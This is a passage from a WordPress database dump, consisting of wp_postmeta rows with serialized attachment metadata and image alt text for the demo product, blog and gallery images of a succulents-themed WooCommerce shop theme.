300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"product-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"product-3-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"product-3-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"product-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"product-3-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(684,2170,'_wp_attachment_image_alt','a'),(685,774,'_wp_attachment_image_alt','o'),(686,798,'_wp_attachment_image_alt','o'),(687,811,'_wp_attachment_image_alt','o'),(688,838,'_wp_attachment_image_alt','a'),(689,130,'_wp_attached_file','2018/01/h1-img2-1.png'),(690,130,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:106;s:6:\"height\";i:15;s:4:\"file\";s:21:\"2018/01/h1-img2-1.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img2-1-100x15.png\";s:5:\"width\";i:100;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img2-1-100x15.png\";s:5:\"width\";i:100;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(691,4230,'_wp_attached_file','2018/01/h1-img2.png'),(692,4230,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:106;s:6:\"height\";i:15;s:4:\"file\";s:19:\"2018/01/h1-img2.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:18:\"h1-img2-100x15.png\";s:5:\"width\";i:100;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"h1-img2-100x15.png\";s:5:\"width\";i:100;s:6:\"height\";i:15;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(693,130,'_wp_attachment_image_alt','a'),(694,4230,'_wp_attachment_image_alt','a'),(695,2171,'_wp_attached_file','2018/01/product-4.jpg'),(696,2171,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:21:\"2018/01/product-4.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"product-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:21:\"product-4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"product-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"product-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"product-4-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"product-4-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"product-4-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"product-4-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"product-4-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"product-4-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"product-4-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"product-4-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-4-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(697,839,'_wp_attached_file','2018/01/blog-img-8.jpg'),(698,839,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1100;s:6:\"height\";i:734;s:4:\"file\";s:22:\"2018/01/blog-img-8.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"blog-img-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"blog-img-8-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"blog-img-8-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"blog-img-8-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"blog-img-8-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"blog-img-8-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"blog-img-8-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"blog-img-8-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:23:\"blog-img-8-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"blog-img-8-550x734.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:734;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"blog-img-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"blog-img-8-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"blog-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(699,142,'_wp_attached_file','2018/01/about-us-gallery-img-1-1.jpg'),(700,142,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:298;s:6:\"height\";i:451;s:4:\"file\";s:36:\"2018/01/about-us-gallery-img-1-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"about-us-gallery-img-1-1-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-1-1-198x300.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-1-1-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-1-1-298x240.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"about-us-gallery-img-1-1-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(701,4231,'_wp_attached_file','2018/01/about-us-gallery-img-1.jpg'),(702,4231,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:298;s:6:\"height\";i:451;s:4:\"file\";s:34:\"2018/01/about-us-gallery-img-1.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"about-us-gallery-img-1-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-1-198x300.jpg\";s:5:\"width\";i:198;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-1-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-1-298x240.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"about-us-gallery-img-1-298x300.jpg\";s:5:\"width\";i:298;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(703,1163,'_wp_attachment_image_alt','a'),(704,1164,'_wp_attachment_image_alt','a'),(705,4225,'_wp_attachment_image_alt','o'),(706,4228,'_wp_attachment_image_alt','a'),(707,1525,'_wp_attachment_image_alt','a'),(708,1171,'_wp_attached_file','2018/01/product4-gallery1.jpg'),(709,1171,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product4-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product4-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product4-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product4-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product4-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product4-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product4-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product4-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product4-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product4-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product4-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product4-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(710,3224,'_wp_attachment_image_alt',''),(711,3227,'_wp_attachment_image_alt','o'),(712,3229,'_wp_attachment_image_alt',''),(713,3231,'_wp_attachment_image_alt','o'),(714,143,'_wp_attached_file','2018/01/about-us-gallery-img-2-1.jpg'),(715,4232,'_wp_attached_file','2018/03/cropped-favicon-img-1.png'),(716,4232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:33:\"2018/03/cropped-favicon-img-1.png\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"cropped-favicon-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"cropped-favicon-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"cropped-favicon-img-1-512x300.png\";s:5:\"width\";i:512;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"cropped-favicon-img-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"cropped-favicon-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"cropped-favicon-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"cropped-favicon-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"cropped-favicon-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(717,143,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:451;s:4:\"file\";s:36:\"2018/01/about-us-gallery-img-2-1.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-550x451.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-550x451.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:36:\"about-us-gallery-img-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(718,4233,'_wp_attached_file','2018/01/about-us-gallery-img-2.jpg'),(719,4233,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:676;s:6:\"height\";i:451;s:4:\"file\";s:34:\"2018/01/about-us-gallery-img-2.jpg\";s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:34:\"about-us-gallery-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-2-550x451.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-2-550x451.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:451;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:34:\"about-us-gallery-img-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:34:\"about-us-gallery-img-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"m